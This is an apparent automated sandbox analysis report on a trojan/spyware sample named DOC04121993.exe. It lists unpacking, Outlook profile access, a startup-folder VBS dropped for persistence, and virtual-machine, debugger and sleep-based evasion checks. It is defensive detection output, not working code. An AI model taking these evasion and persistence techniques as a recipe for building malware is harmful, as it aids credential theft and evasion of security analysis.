                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000003.00000002.224468567.0000000002160000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000005.00000002.226401330.0000000002170000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000007.00000001.223556134.00000000004D6000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, DPAPI.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/2@1/1
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00420390 GetLastError,FormatMessageA,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 2_2_0233B1E6 AdjustTokenPrivileges,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 2_2_0233B1AF AdjustTokenPrivileges,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00408D0A GetDiskFreeSpaceA,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00416B24 FindResourceA,LoadResource,SizeofResource,LockResource,
                      Source: C:\Windows\SysWOW64\notepad.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs'
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\Desktop\DOC04121993.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOC04121993.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\DOC04121993.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: DOC04121993.exe | Virustotal: Detection: 69%
                      Source: DOC04121993.exe | ReversingLabs: Detection: 81%
                      Source: unknown | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: unknown | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs'
                      Source: unknown | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

                      Data Obfuscation:

                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Unpacked PE file: 2.2.DOC04121993.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Unpacked PE file: 2.2.DOC04121993.exe.2240000.3.unpack
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Unpacked PE file: 7.2.DOC04121993.exe.2290000.3.unpack
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Unpacked PE file: 2.2.DOC04121993.exe.400000.0.unpack
                      .NET source code contains potential unpacker
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.cs | .Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.cs | .Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.2.DOC04121993.exe.400000.0.unpack, gtu.cs | .Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.2.DOC04121993.exe.9e0000.2.unpack, gtu.cs | .Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.DOC04121993.exe.21b0000.2.unpack, gtu.cs | .Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.DOC04121993.exe.2290000.3.unpack, gtu.cs | .Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00446CD4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00447320 push 004473ADh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00426024 push 00426050h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00428038 push 00428064h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00466080 push 004660ACh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0040C090 push 0040C20Ch; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0046C150 push 0046C1C6h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00450134 push 0045019Fh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0040C20E push 0040C27Fh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0040C210 push 0040C27Fh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004482CC push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004262DC push 00426308h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0040C2EE push 0040C31Ch; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0040C2F0 push 0040C31Ch; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0041A288 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00410324 push 00410385h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00410388 push 00410589h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0042646C push 00426498h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0044856C push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00470574 push 004705A0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0041058C push 004106D0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0040660A push 0040665Dh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0040660C push 0040665Dh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004106A4 push 004106D0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0043277C push 004327A8h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004067DC push 00406808h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004327EC push 00432818h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004327B4 push 004327E0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0044884C push 00448878h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00406854 push 00406880h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0043285C push 00432888h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00432824 push 00432850h; ret

                      Boot Survival:

                      Drops VBS files to the startup folder
                      Source: C:\Windows\SysWOW64\notepad.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 3_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 5_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 8_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00446CD4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\DOC04121993.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 0_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 3_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 5_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 8_2_00436808
                      Delayed program exit found
                      Source: C:\Windows\SysWOW64\notepad.exe Code function: 1_2_00A305C0 Sleep,ExitProcess,
                      Source: C:\Windows\SysWOW64\notepad.exe Code function: 6_2_003F05C0 Sleep,ExitProcess,
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\DOC04121993.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\DOC04121993.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, (4 occurrences)
                      Source: C:\Users\user\Desktop\DOC04121993.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 8_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064 Thread sleep time (130 calls, each at or beyond the -30000s threshold): -922337203685477s, -30000s, -119564s, -59594s, -59188s, -117376s, -117000s, -58282s, -115188s, -57406s, -57188s, -113000s, -56282s, -55688s, -82782s, -55000s, -54094s, -53000s, -52782s, -103376s, -103000s, -75891s, -74250s, -73923s, -48188s, -48000s, -47094s, -46500s, -92000s, -66750s, -43594s, -63750s, -63423s, -61782s, -61500s, -60141s, -78000s, -58173s, -37688s, -36594s, -53250s, -35282s, -51282s, -51000s, -33594s, -49641s, -32500s, -32282s, -48000s, -47673s, -31188s, -30782s, -45750s, -30094s, -42750s, -40032s, -39750s, -39423s, -36750s, -31500s, -81423s, -53876s, -80391s, -80064s, -52094s, -51876s, -76782s, -51000s, -50094s, -49876s, -49000s, -48594s, -47500s, -47282s, -46376s, -69282s, -45500s, -67923s, -67641s, -67314s, -66282s, -66000s, -43782s, -64641s, -64314s, -42688s, -63000s, -62673s, -62064s, -40688s, -60423s, -39594s, -39376s, -58782s, -38500s, -38282s, -57141s, -56814s, -55782s, -55500s, -55173s, -54141s, -53814s, -53532s, -52500s, -52173s, -51891s, -47250s, -59500s, -58876s, -57782s, -57376s, -56688s, -55782s, -55594s, -55376s, -54688s, -54500s, -53188s, -52500s, -52282s, -43376s, -39876s, -33688s, -33500s, -32876s, -32594s, -30876s, -30688s, -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 5696 Thread sleep count: 79 > 30
                      Source: C:\Users\user\Desktop\DOC04121993.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOC04121993.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DOC04121993.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 0_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 3_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 5_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 8_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 0_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 0_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 0_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 3_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 3_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 3_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 5_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 5_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 5_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 8_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 8_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 8_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 0_2_00420920 GetSystemInfo,
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: wscript.exe, 00000004.00000002.221090997.0000024201259000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: DOC04121993.exe, 00000002.00000002.469094063.0000000005B60000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process queried: DebugFlags
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process queried: DebugFlags
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process queried: DebugFlags
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_04E33468 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 0_2_00446CD4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_0046D412 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_0046D4D0 mov eax, dword ptr fs:[00000030h]
